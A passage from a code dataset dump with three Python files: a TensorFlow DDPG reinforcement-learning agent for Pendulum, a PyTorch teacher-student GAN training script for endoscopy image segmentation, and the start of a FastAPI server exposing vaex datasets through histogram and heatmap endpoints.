# learning rate for critic\n GAMMA = 0.9 # reward discount\n TAU = 0.01 # soft replacement\n MEMORY_CAPACITY = 10000\n BATCH_SIZE = 32\n\n def __init__(self, a_dim, s_dim, a_bound,):\n self.memory = np.zeros((self.MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)\n self.pointer = 0\n self.sess = tf.Session()\n\n self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,\n self.S = tf.placeholder(tf.float32, [None, s_dim], 's')\n self.S_ = tf.placeholder(tf.float32, [None, s_dim], 's_')\n self.R = tf.placeholder(tf.float32, [None, 1], 'r')\n\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, scope='eval', trainable=True)\n a_ = self._build_a(self.S_, scope='target', trainable=False)\n with tf.variable_scope('Critic'):\n # assign self.a = a in memory when calculating q for td_error,\n # otherwise the self.a is from Actor when updating Actor\n q = self._build_c(self.S, self.a, scope='eval', trainable=True)\n q_ = self._build_c(self.S_, a_, scope='target', trainable=False)\n\n # networks parameters\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n\n # target net replacement\n self.soft_replace = [tf.assign(t, (1 - self.TAU) * t + self.TAU * e)\n for t, e in zip(self.at_params + self.ct_params, self.ae_params + self.ce_params)]\n\n q_target = self.R + self.GAMMA * q_\n # in the feed_dic for the td_error, the self.a should change to actions in memory\n td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)\n self.ctrain = tf.train.AdamOptimizer(self.LR_C).minimize(td_error, var_list=self.ce_params)\n\n a_loss = - tf.reduce_mean(q) # maximize the q\n self.atrain = tf.train.AdamOptimizer(self.LR_A).minimize(a_loss, var_list=self.ae_params)\n\n self.sess.run(tf.global_variables_initializer())\n\n def choose_action(self, s):\n actions = self.sess.run(self.a, {self.S: s[np.newaxis, :]})\n # print(\"actions: \", actions)\n return actions[0]\n\n def learn(self):\n # soft target replacement\n self.sess.run(self.soft_replace)\n\n indices = np.random.choice(self.MEMORY_CAPACITY, size=self.BATCH_SIZE)\n bt = self.memory[indices, :]\n bs = bt[:, :self.s_dim]\n ba = bt[:, self.s_dim: self.s_dim + self.a_dim]\n br = bt[:, -self.s_dim - 1: -self.s_dim]\n bs_ = bt[:, -self.s_dim:]\n\n self.sess.run(self.atrain, {self.S: bs})\n self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n\n def store_transition(self, s, a, r, s_):\n transition = np.hstack((s, a, [r], s_))\n index = self.pointer % self.MEMORY_CAPACITY # replace the old memory with new memory\n self.memory[index, :] = transition\n self.pointer += 1\n\n def _build_a(self, s, scope, trainable):\n with tf.variable_scope(scope):\n net = tf.layers.dense(s, 30, activation=tf.nn.relu, name='l1', trainable=trainable)\n a = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)\n return tf.multiply(a, self.a_bound, name='scaled_a')\n\n def _build_c(self, s, a, scope, trainable):\n with tf.variable_scope(scope):\n n_l1 = 30\n w1_s = tf.get_variable('w1_s', [self.s_dim, n_l1], trainable=trainable)\n w1_a = tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)\n net = tf.nn.relu(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1)\n return tf.layers.dense(net, 1, trainable=trainable) # Q(s,a)\n \n def save(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.save(self.sess, filename)\n \n def load(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(self.sess, filename)\n\n############################### training ####################################\n############################### A Demo ####################################\n\nMAX_EPISODES = 2000\nMAX_EP_STEPS = 200\nRENDER = False\nENV_NAME = 'Pendulum-v0'\n\ndef train():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high\n\n ddpg = DDPG(a_dim, s_dim, a_bound)\n\n var = 3 # control exploration\n t1 = time.time()\n ave_rs = []\n for episode in range(MAX_EPISODES):\n s = env.reset()\n ep_reward = 0\n for j in range(MAX_EP_STEPS):\n if RENDER:\n env.render()\n\n # Add exploration noise\n a = ddpg.choose_action(s)\n a = np.clip(np.random.normal(a, var), -2, 2) # add randomness to action selection for exploration\n s_, r, done, info = env.step(a)\n\n ddpg.store_transition(s, a, r / 10, s_)\n\n if ddpg.pointer > ddpg.MEMORY_CAPACITY:\n var *= .9995 # decay the action randomness\n ddpg.learn()\n\n s = s_\n ep_reward += r\n if j == MAX_EP_STEPS-1:\n # print('Episode:', episode, ' Reward: %i' % int(ep_reward), 'Explore: %.2f' % var, )\n # if ep_reward > -300:RENDER = True\n break\n if episode % 100 == 0:\n total_reward = 0\n for i in range(10):\n state = env.reset()\n for j in range(MAX_EP_STEPS):\n env.render()\n action = ddpg.choose_action(state) # direct action for test\n state,reward,done,_ = env.step(action)\n total_reward += reward\n if done:\n break\n ave_reward = total_reward/300\n print ('episode: ',episode,'Evaluation Average Reward:',ave_reward)\n ave_rs.append(ave_reward)\n print(ave_rs)\n if (sum(ave_rs[-5:])/5.0 > -10):\n ddpg.save('./log/model.ckpt')\n return\n print('Running time: ', time.time() - t1)\n\ndef validate():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high\n\n ddpg = DDPG(a_dim, s_dim, a_bound)\n ddpg.load('./log/model.ckpt')\n\n var = 3 # control exploration\n t1 = time.time()\n total_reward = 0\n for i in range(10):\n state = env.reset()\n for j in range(MAX_EP_STEPS):\n env.render()\n action = ddpg.choose_action(state) # direct action for test\n state,reward,done,_ = env.step(action)\n total_reward += reward\n if done:\n break\n ave_reward = total_reward/300\n print ('Evaluation Average Reward:',ave_reward)\n print('Running time: ', time.time() - t1)\n\nif __name__ == \"__main__\":\n train()\n # validate()\n pass","repo_name":"lab821/SDN-DRL","sub_path":"algorithms/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21063112955","text":"import wandb\nwandb.login()\n\nuser = \"ragu2399\"\nproject = \"gan_trail\"\ndisplay_name = \"t2\"\n\nwandb.init(entity=user, project=project, name=display_name)\n\nimport torch\nimport math\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom tqdm import tqdm\nimport torch.nn as nn\nimport torch.optim as optim\nfrom loss import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torchsummary import summary\nimport Teacher_model\nimport student_model\nimport Discriminator_model\nimport os\nfrom utils import (\n save_checkpoint,\n get_loaders,\n check_accuracy,\n save_predictions_as_imgs,\n)\ntorch.cuda.empty_cache()\nrandom_seed = 242 # or any of your favorite number \ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed(random_seed)\ntorch.backends.cudnn.deterministic = True\nnp.random.seed(random_seed)\ntorch.cuda.is_available()\n\n\n# Hyperparameters etc.\n\nLEARNING_RATE = 1e-5\nBETA_1=0.5\nBETA_2=0.999\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nBATCH_SIZE = 1\nNUM_EPOCHS = 1000\nNUM_WORKERS =12\nIMAGE_HEIGHT = 256 # 1280 originally\nIMAGE_WIDTH = 256 # 1918 originally\nPIN_MEMORY = True\nLOAD_MODEL = False\nTRAIN_IMG_DIR = \"../ORDERED_ENDOCV_DATASET/IMAGES/\"\nTRAIN_MASK_DIR = \"../ORDERED_ENDOCV_DATASET/MASKS/\"\nVAL_IMG_DIR = \"../ORDERED_ENDOCV_DATASET/VALIDATION_IMAGES/\"\nVAL_MASK_DIR = \"../ORDERED_ENDOCV_DATASET/VALIDATION_MASK/\"\nCLIP_LIMIT=6\nBATCH_INDEX=400\nNUM_IMAGES=os.listdir(TRAIN_IMG_DIR)\nNUM_IMAGES=len(NUM_IMAGES)\nprint(f'Total number of Images : {NUM_IMAGES}')\n\nTEACHER_1_PATH=\"./WEIGHTS/TEACHER_1.pth\" #SPECIFY TEACHER 1 MODEL PATH\nTEACHER_2_PATH=\"./WEIGHTS/TEACHER_2.pth\" #SPECIFY TEACHER 2 MODEL PATH\nSTUDENT_PATH=\"./WEIGHTS/STUDENT.pth\" #SPECIFY STUDENT MODEL PATH\nDISCRIMINATOR_PATH=\"./WEIGHTS/DISCRIMINATOR.pth\" #SPECIFY TEACHER 1 MODEL PATH\n\n\n#ALL_LOSS_FUNCTIONS\nlossfn_1 = DiceLoss()\nlossfn_2 = DiceBCELoss()\nlossfn_3 = IoULoss()\nlossfn_4 = FocalLoss()\nlossfn_5 = TverskyLoss()\nlossfn_6 = FocalTverskyLoss()\nlossfn_7 = ComboLoss()\n\n\ndef get_models(DEVICE): \n \n # Teacher network. Note: For BraTS, the total number of modalities/sequences is 4. Also, BraTS has 4 segmentation classes.\n teacher_model =Teacher_model.UNet_SAB().to(DEVICE)\n teacher_pretrained_statedict = torch.load(TEACHER_PATH)\n teacher_model.load_state_dict(teacher_pretrained_statedict[\"state_dict\"])\n print(\"Created teacher model and with trained_weights.\")\n\n # Freeze teacher weights.\n for param in teacher_model.parameters():\n param.requires_grad = False\n \n # Student network. Note: For BraTS, there is only 1 post-contrast modalities/sequences, so the student recieves 3. \n # Also, BraTS has 4 segmentation classes.\n generator_model = student_model.UNet_SAB_STUDENT().to(DEVICE)\n generator_pretrained_statedict = torch.load(STUDENT_PATH)\n generator_model.load_state_dict(generator_pretrained_statedict[\"state_dict\"])\n print(f' Created generator model (i.e., the student model) from {STUDENT_PATH}')\n\n # Discriminator network. The discriminator recieves the student input modalities/sequences (i.e., 3 for BraTS) and the \n # output segmentation map (i.e., 4 classes for BraTS) as input (i.e., a total of 3+4 channels).\n discriminator_model = Discriminator_model.Discriminator().to(DEVICE)\n print(\"Created discriminator/critic.\")\n \n return teacher_model, generator_model, discriminator_model\n\n\n\ndef get_optimizers(generator_model, discriminator_model):\n\n # Select an optimizer for the generator\n gen_optimizer = torch.optim.Adam(generator_model.parameters(), lr=LEARNING_RATE, betas=(BETA_1, BETA_2))\n\n # Select an optimizer for the discriminator\n disc_optimizer = torch.optim.Adam(discriminator_model.parameters(), lr=LEARNING_RATE, betas=(BETA_1,BETA_2))\n \n return gen_optimizer, disc_optimizer\n\n\n\ndef get_criteria(device):\n \n # Criterion\n criterion_MSE = torch.nn.MSELoss().to(device)\n\n criterion_CE = nn.CrossEntropyLoss().to(device)\n\n # softmax\n n_softmax = nn.Softmax(dim=1).to(device)\n \n return criterion_MSE, criterion_CE, n_softmax\n\n\n\ndef load_pre_trained_model(generator_model,discriminator_model):\n\n\n # LOAD PRE-TRINAED STUDENT\n student_pretrained_statedict = torch.load(STUDENT_PATH)\n generator_model.load_state_dict(student_pretrained_statedict[\"state_dict\"])\n print(f' Generator model loaded from {STUDENT_PATH}' )\n\n # LOAD PRE-TRINAED DISCRIMINATOR\n Discriminator_pretrained_statedict = torch.load(DISCRIMINATOR_PATH)\n discriminator_model.load_state_dict(Discriminator_pretrained_statedict[\"state_dict\"])\n print(f' DISC model loaded from {DISCRIMINATOR_PATH}' )\n\n \n return generator_model,discriminator_model \n\ndef Plot(input_image,predicted,target):\n input_image=input_image.cpu().detach().numpy().astype(np.float32)\n predicted=predicted.cpu().detach().numpy().astype(np.float32)\n target=target.cpu().detach().numpy().astype(np.float32)\n \n num_images=input_image.shape[0]\n \n for image,pred,targ in zip(input_image,predicted,target):\n\n \n image=np.swapaxes(image,0,2)\n pred=np.swapaxes(pred,0,2)\n targ=np.swapaxes(targ,0,2)\n\n \n plt.figure(figsize=(20,20))\n plt.subplot(1,3,1,title='input')\n plt.imshow(image)\n plt.subplot(1,3,2,title='predicted')\n pred[pred >= 0.5]=1.0\n pred[pred < 0.5]=0.0\n plt.imshow(pred)\n plt.subplot(1,3,3,title='Target')\n plt.imshow(targ)\n plt.show()\n\ndef train_log(loss_1,batch_idx,epoch):\n wandb.log({\"DiceLoss\": loss_1},step=batch_idx)\n \n \ndef training_epoch(models, criteria, optimizers, trainset, device,epoch):\n \n # Unpack\n teacher_model, generator_model, discriminator_model = models\n criterion_MSE, criterion_CE = criteria\n gen_optimizer, disc_optimizer = optimizers\n \n # Counter\n sample_count = 0.0\n \n # Loss tracker\n mean_LS = 0.0\n mean_LHD = 0.0\n\n # Set to train\n generator_model.train()\n teacher_model.train()\n discriminator_model.train()\n\n \n loop = tqdm(trainset)\n # Go over each batch of the training set\n\n for batch_idx, (datas, targets) in enumerate(loop):\n# datas,targets=next(iter(loop))\n\n# print(\"--- SAMPLE\",int(sample_count),\" ---\")\n\n ###############################################\n ############### GET INPUT DATA ################\n ############################################### \n\n x_teacher = datas.to(device=DEVICE)\n x_student = datas.to(device=DEVICE)\n y = targets.long().unsqueeze(1).to(device=DEVICE)\n\n\n # Get the teacher output for this sample. This will be the real segmentation map.\n with torch.no_grad():\n real_segmap, real_features_0, real_features_1,real_features_2,real_features_3 = teacher_model(x_teacher)\n\n ###########################################\n ########### TRAIN THE GENERATOR ###########\n ###########################################\n\n # zero the generator gradient\n gen_optimizer.zero_grad()\n\n # Run the input data through the generator\n fake_segmap, fake_features_0, fake_features_1, fake_features_2, fake_features_3 = generator_model(x_student)\n\n # Feed the disc the \"fake\" data\n disc_fake_adv = discriminator_model(fake_segmap, x_student, fake_features_0, fake_features_1, fake_features_2, fake_features_3)\n\n # Create real and fake labels.\n disc_out_shape = disc_fake_adv.shape\n real = torch.ones(disc_out_shape).to(device)\n fake = torch.zeros(disc_out_shape).to(device)\n\n # Compute adversarial loss.\n gen_loss_GAN = criterion_MSE(disc_fake_adv, real)\n\n # Compute voxel-base loss with GROUND TRUTH\n gen_loss_VOX=lossfn_1(fake_segmap, y)\n\n # gen_loss_VOX = criterion_CE(fake_segmap, y)\n\n # Compute TOTAL gen loss, back-propogate, and step generator optimizer forward\n gen_loss = gen_loss_VOX + ((0.2)*gen_loss_GAN)\n gen_loss.backward()\n torch.nn.utils.clip_grad_norm_(generator_model.parameters(), CLIP_LIMIT)\n gen_optimizer.step()\n\n\n #PLOT GENERATOR OUTPUT\n # if batch_idx%BATCH_INDEX==0:\n if batch_idx%BATCH_INDEX==0:\n\n print(f'EPOCH : {epoch}')\n print(f'DICE loss : {gen_loss_VOX}')\n\n Plot(x_teacher,fake_segmap,y)\n if epoch==0:\n train_log(gen_loss_VOX,(batch_idx*BATCH_SIZE),epoch)\n else:\n train_log(gen_loss_VOX,((batch_idx*BATCH_SIZE)+(NUM_IMAGES*epoch)),epoch)\n\n ###############################################\n ########### TRAIN THE DISCRIMINATOR ###########\n ###############################################\n\n # zero the discriminator gradient\n disc_optimizer.zero_grad()\n\n # REMOVE GRADIENT FOR GENERATOR\n fake_segmap = fake_segmap.detach()\n fake_features_0=fake_features_0.detach()\n fake_features_1=fake_features_1.detach()\n fake_features_2=fake_features_2.detach()\n fake_features_3=fake_features_3.detach()\n\n\n # Feed the disc the \"real\" data r\n disc_real = discriminator_model(real_segmap, x_student, real_features_0, real_features_1,real_features_2,real_features_3)\n disc_loss_real = criterion_MSE(disc_real, real)\n\n\n # Feed the disc the \"fake\" data \n disc_fake = discriminator_model(fake_segmap, x_student, fake_features_0, fake_features_1, fake_features_2, fake_features_3 )\n disc_loss_fake = criterion_MSE(disc_fake, fake)\n\n\n # Compute total discriminator loss.\n disc_loss = disc_loss_real + disc_loss_fake\n\n # Determine if we should update the discriminator for this sample.\n disc_real_mean = torch.mean(torch.ge(disc_real,0.5).float())\n disc_fake_mean = torch.mean(torch.le(disc_fake,0.5).float())\n disc_mean = (disc_real_mean + disc_fake_mean)/2.0\n\n # Back-propogate the loss and step discriminator optimizer forward, if discriminator performance is\n # under the threshold.\n if(disc_mean <= 0.8):\n disc_loss.backward() \n disc_optimizer.step()\n\n\n # Move data from GPU to CPU. This is done in order to prevent a strange CUDA error encountered during training, which \n # prints the message: \"CUDA: an illegal memory access was encountered\".\n x_teacher = x_teacher.detach().to('cpu')\n x_student = x_student.detach().to('cpu')\n y = y.detach().to('cpu')\n real_segmap = real_segmap.detach().to('cpu')\n real_features_0=real_features_0.detach()\n real_features_1=real_features_1.detach()\n real_features_2=real_features_2.detach()\n real_features_3=real_features_3.detach()\n\n disc_fake_adv = disc_fake_adv.detach().to('cpu')\n real = real.detach().to('cpu')\n fake = fake.detach().to('cpu')\n gen_loss_GAN = gen_loss_GAN.detach().to('cpu')\n gen_loss_VOX = gen_loss_VOX.detach().to('cpu')\n gen_loss = gen_loss.detach().to('cpu')\n fake_segmap = fake_segmap.detach().to('cpu')\n fake_features_0=fake_features_0.detach()\n fake_features_1=fake_features_1.detach()\n fake_features_2=fake_features_2.detach()\n fake_features_3=fake_features_3.detach()\n\n disc_real = disc_real.detach().to('cpu')\n disc_loss_real = disc_loss_real.detach().to('cpu')\n disc_fake = disc_fake.detach().to('cpu')\n disc_loss_fake = disc_loss_fake.detach().to('cpu')\n disc_loss = disc_loss.detach().to('cpu')\n disc_real_mean = disc_real_mean.detach().to('cpu')\n disc_fake_mean = disc_fake_mean.detach().to('cpu')\n disc_mean = disc_mean.detach().to('cpu')\n\n # Update loss trackers.\n mean_LS = mean_LS + gen_loss.item()\n mean_LHD = mean_LHD + disc_loss.item()\n\n # Increment sample counter. \n sample_count+=1.0\n\n # Find epoch loss.\n mean_LS = mean_LS/sample_count\n mean_LHD = mean_LHD/sample_count\n\n\n loop.set_postfix(loss=gen_loss_VOX.item())\n\n\n return (teacher_model, generator_model,discriminator_model), (gen_optimizer, disc_optimizer), (mean_LS, mean_LHD)\n\n\n# Perform validation for this epoch.\n\n\n\ndef main():\n train_transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.ShiftScaleRotate(shift_limit=0.05, scale_limit=0.05, rotate_limit=15, p=0.5),\n A.Rotate(limit=35, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.RandomBrightnessContrast(p=0.5),\n ToTensorV2(),\n ],\n )\n\n val_transforms = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.ShiftScaleRotate(shift_limit=0.05, scale_limit=0.05, rotate_limit=15, p=0.5),\n A.Rotate(limit=35, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.RandomBrightnessContrast(p=0.5),\n ToTensorV2(),\n ],\n )\n\n\n train_loader, val_loader = get_loaders(\n TRAIN_IMG_DIR,\n TRAIN_MASK_DIR,\n VAL_IMG_DIR,\n VAL_MASK_DIR,\n BATCH_SIZE,\n train_transform,\n val_transforms,\n NUM_WORKERS,\n PIN_MEMORY,\n )\n \n validate_vm_list = []\n running_vm = 0.0\n #LOADING_MODEL\n teacher_model, generator_model, discriminator_model = get_models(DEVICE) \n summary(teacher_model,(3,512,512))\n summary(generator_model,(3,512,512))\n summary(discriminator_model,[(1,512,512),(3,512,512),(32,512,512),(128,512,512),(128,512,512),(32,512,512)])\n #GETTING OPTIMIZERS\n gen_optimizer, disc_optimizer = get_optimizers(generator_model, discriminator_model)\n #GETTING_CRITERIA\n criterion_MSE, criterion_CE, n_softmax = get_criteria(DEVICE)\n \n \n #LOADING PRE TRAINED WEIGHTS\n if LOAD_MODEL:\n generator_model,discriminator_model = load_pre_trained_model( generator_model,discriminator_model)\n\n\n scheduler = torch.optim.lr_scheduler.StepLR(gen_optimizer, step_size=10, gamma=0.1)\n\n\n for epoch in range(NUM_EPOCHS):\n print(f'{epoch} EPOCH LR {scheduler.get_last_lr()}' )\n wandb.watch(generator_model,log=\"all\")\n \n \n models, optimizers, training_losses = training_epoch((teacher_model, generator_model, discriminator_model), (criterion_MSE, criterion_CE), (gen_optimizer, disc_optimizer), train_loader, DEVICE,epoch)# train_fn(train_loader, model, optimizer,epoch)#, loss_fn)#, scaler)\n\n\n teacher_model, generator_model, discriminator_model = models\n gen_optimizer, disc_optimizer = optimizers\n mean_LS, mean_LHD = training_losses \n\n\n \n ###########################################\n ########## SAVE MODEL PARAMETERS ##########\n ###########################################\n\n\n\n ##Save generator and discriminator model and optimizer.\n \n gen_checkpoint = {\n \"state_dict\": generator_model.state_dict(),\n \"optimizer\":gen_optimizer.state_dict(),\n }\n model_name=\"Generator\"\n save_checkpoint(gen_checkpoint,epoch,model_name)\n \n dis_checkpoint = {\n \"state_dict\": discriminator_model.state_dict(),\n \"optimizer\":disc_optimizer.state_dict(),\n }\n model_name=\"discriminator\"\n save_checkpoint(dis_checkpoint,epoch,model_name)\n\n scheduler.step()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ragu2399/XP-NET","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17078160302","text":"import threading\nfrom typing import List, Union, Optional, Dict\nimport time\nimport asyncio\nimport io\nimport logging\nimport sys\nimport os\nimport pathlib\nimport contextlib\nimport json\n\n\nfrom fastapi import FastAPI, Query, Path, Depends, Request, WebSocket, APIRouter, HTTPException\nfrom fastapi.security import OAuth2PasswordBearer\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import Response\nfrom fastapi.openapi.docs import get_swagger_ui_html\nimport requests\n\n\nfrom pydantic import BaseModel\nfrom starlette.responses import HTMLResponse, PlainTextResponse\n\n\nimport vaex\nimport vaex.server\nimport vaex.settings\nimport vaex.server.websocket\n\nlogger = logging.getLogger(\"vaex.server\")\nVAEX_FAVICON = 'https://vaex.io/img/logos/vaex_alt.png'\nHERE = pathlib.Path(__file__).parent\n\n\n\nclass ImageResponse(Response):\n media_type = \"image/png\"\n\n\nclass HistogramInput(BaseModel):\n dataset_id: str\n expression: str\n shape: int = 128\n min: Optional[Union[float, int, str]] = None\n max: Optional[Union[float, int, str]] = None\n filter: Optional[str] = None\n virtual_columns: Optional[Dict[str, str]] = None\n\n\nclass HistogramOutput(BaseModel):\n dataset_id: str\n # expression: str\n # what: str\n # bins: List[int]\n centers: List[float]\n # edges: List[float]\n values: Union[List[float], List[int]] # counts\n\n\nclass HeatmapInput(BaseModel):\n dataset_id: str\n expression_x: str\n expression_y: str\n shape_x: int = 128\n shape_y: int = 128\n min_x: Optional[Union[float, int, str]] = None\n max_x: Optional[Union[float, int, str]] = None\n min_y: Optional[Union[float, int, str]] = None\n max_y: Optional[Union[float, int, str]] = None\n filter: Optional[str] = None\n virtual_columns: Optional[Dict[str, str]] = None\n\n\nclass HeatmapOutput(BaseModel):\n dataset_id: str\n expression_x: str\n expression_y: str\n # expression: str\n # what: str\n # bins: List[int]\n # centers: List[float]\n centers_x: List[float]\n centers_y: List[float]\n # edges: List[float]\n values: Union[List[List[float]], List[List[int]]] # counts\n\n\ndatasets = {}\n\nopenapi_tags = [\n {\n \"name\": \"quick\",\n \"description\": \"Quick API for common cases\",\n }\n\n]\n\nrouter = APIRouter()\npath_dataset = Path(..., title=\"The name of the dataset\", description=\"The name of the dataset\")\n\n\n@router.get(\"/hello\", include_in_schema=False)\nasync def hello():\n return \"hi\"\n\n\n@router.get(\"/\", response_class=HTMLResponse, include_in_schema=False)\nasync def root():\n with (HERE / 'index.html').open() as f:\n content = f.read()\n data = []\n for name, ds in datasets.items():\n data.append({\n 'name': name,\n 'rows': ds.row_count,\n 'column': list(ds),\n 'schema': [{'name': k, 'type': str(vaex.dtype(v))} for k, v in ds.schema().items()]\n })\n content = content.replace('// DATA', 'app.$data.datasets = %s\\n app.$data.graphql = %s' % (json.dumps(data), json.dumps(vaex.settings.server.graphql)))\n return content\n\n\n@router.get(\"/dataset\", summary=\"Lists all dataset names\")\nasync def dataset():\n return list(datasets.keys())\n\n\n@router.get(\"/dataset/{dataset_id}\", summary=\"Meta information about a dataset (schema etc)\")\nasync def dataset(dataset_id: str = path_dataset):\n with get_df(dataset_id) as df:\n schema = {k: str(v) for k, v in df.schema().items()}\n return {\"id\": dataset_id, \"row_count\": len(df), \"schema\": schema}\n\n@contextlib.contextmanager\ndef get_df(name):\n if name not in datasets:\n raise HTTPException(status_code=404, detail=f\"dataset {name!r} not found\")\n yield vaex.from_dataset(datasets[name])\n\n\ndef _number(v):\n if v is None:\n return v\n try:\n return float(v)\n except:\n return v\n\nasync def _compute_histogram(input: HistogramInput) -> HistogramOutput:\n with get_df(input.dataset_id) as df:\n limits = [_number(input.min), _number(input.max)]\n limits = df.limits(input.expression, limits, delay=True)\n await df.execute_async()\n limits = await limits\n\n counts = df.count(binby=input.expression, limits=limits, shape=input.shape, delay=True, selection=input.filter)\n await df.execute_async()\n counts = await counts\n return df, counts, limits\n\n\n@router.get(\"/histogram/{dataset_id}/{expression}\", response_model=HistogramOutput, tags=[\"quick\"], summary=\"histogram data (1d)\")\nasync def histogram(input: HistogramInput = Depends(HistogramInput)) -> HistogramOutput:\n df, counts, limits = await _compute_histogram(input)\n centers = df.bin_centers(input.expression, limits, input.shape)\n return HistogramOutput(dataset_id=input.dataset_id, values=counts.tolist(), centers=centers.tolist())\n\n\n@router.post(\"/histogram\", response_model=HistogramOutput, tags=[\"quick\"], summary=\"histogram data (1d)\")\nasync def histogram(input: HistogramInput) -> HistogramOutput:\n df, counts, limits = await _compute_histogram(input)\n centers = df.bin_centers(input.expression, limits, input.shape)\n return HistogramOutput(dataset_id=input.dataset_id,\n expression=input.expression,\n values=counts.tolist(),\n centers=centers.tolist())\n\n\n@router.get(\"/histogram.plot/{dataset_id}/{expression}\", response_class=ImageResponse, tags=[\"quick\"], summary=\"Quick histogram plot\")\nasync def histogram_plot(input: HistogramInput = Depends(HistogramInput)) -> HistogramOutput:\n import matplotlib\n import matplotlib.pyplot as plt\n df, counts, limits = await _compute_histogram(input)\n matplotlib.use('agg', force=True)\n fig = plt.figure()\n df.viz.histogram(input.expression, limits=limits, shape=input.shape, grid=counts)\n with io.BytesIO() as f:\n fig.canvas.print_png(f)\n plt.close(fig)\n return ImageResponse(content=f.getvalue())\n\n\nasync def _compute_heatmap(input: HeatmapInput) -> HeatmapOutput:\n with get_df(input.dataset_id) as df:\n limits_x = [_number(input.min_x), _number(input.max_x)]\n limits_y = [_number(input.min_y), _number(input.max_y)]\n limits_x = df.limits(input.expression_x, limits_x, delay=True)\n limits_y = df.limits(input.expression_y, limits_y, delay=True)\n await df.execute_async()\n limits_x = await limits_x\n limits_y = await limits_y\n\n limits = [limits_x, limits_y]\n state = {\n 'virtual_columns': input.virtual_columns or {}\n }\n df.state_set(state)\n shape = [input.shape_x, input.shape_y]\n counts = df.count(binby=[input.expression_x, input.expression_y], limits=limits, shape=shape, delay=True, selection=input.filter)\n await df.execute_async()\n counts = await counts\n return df, counts, limits\n\n\n@router.get(\"/heatmap/{dataset_id}/{expression_x}/{expression_y}\", response_model=HeatmapOutput, tags=[\"quick\"], summary=\"heatmap data (2d)\")\nasync def heatmap(input: HeatmapInput = Depends(HeatmapInput)) -> HeatmapOutput:\n df, counts, limits = await _compute_heatmap(input)\n centers_x = df.bin_centers(input.expression_x, limits[0], input.shape_x)\n centers_y = df.bin_centers(input.expression_y, limits[1], input.shape_y)\n return HeatmapOutput(dataset_id=input.dataset_id,\n expression_x=input.expression_x,\n expression_y=input.expression_y,\n values=counts.tolist(),\n centers_x=centers_x.tolist(),\n centers_y=centers_y.tolist())\n\n\n@router.post(\"/heatmap\", response_model=HeatmapOutput, tags=[\"quick\"], summary=\"heatmap data (2d)\")\nasync def heatmap(input: HeatmapInput) -> HeatmapOutput:\n df, counts, limits = await _compute_heatmap(input)\n centers_x = df.bin_centers(input.expression_x, limits[0], input.shape_x)\n centers_y = df.bin_centers(input.expression_y, limits[1], input.shape_y)\n return HeatmapOutput(dataset_id=input.dataset_id,\n expression_x=input.expression_x,\n expression_y=input.expression_y,\n values=counts.tolist(),\n centers_x=centers_x.tolist(),\n centers_y=centers_y.tolist())\n\n\n@router.get(\"/heatmap.plot/{dataset_id}/{expression_x}/{expression_y}\", response_class=ImageResponse, tags=[\"quick\"], summary=\"Quick heatmap plot\")\nasync def heatmap_plot(input: HeatmapInput = Depends(HeatmapInput), f: str =\"identity\") -> HeatmapOutput:\n import matplotlib\n import matplotlib.pyplot as plt\n df, counts, limits = await _compute_heatmap(input)\n matplotlib.use('agg', force=True)\n fig = plt.figure()\n df.viz.heatmap(input.expression_x, input.expression_y, limits=limits, shape=[input.shape_x, input.shape_y], grid=counts, f=f)\n with io.BytesIO() as f:\n fig.canvas.print_png(f)\n plt.close(fig)\n return ImageResponse(content=f.getvalue())\n\n\n@router.websocket(\"/websocket\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n handler = vaex.server.websocket.WebSocketHandler(websocket.send_bytes, service_threaded)\n while True:\n data = await websocket.receive()\n if data['type'] == 'websocket.disconnect':\n return\n # see https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task\n # TODO: replace after we drop 36 support asyncio.create_task(handler.handle_message(data['bytes']))\n asyncio.ensure_future(handler.handle_message(data['bytes']))\n\n\napp = FastAPI(\n title=\"Vaex dataset/dataframe API\",\n description=\"Vaex: Fast data aggregation\",\n version=vaex.__version__[\"vaex-server\"],\n 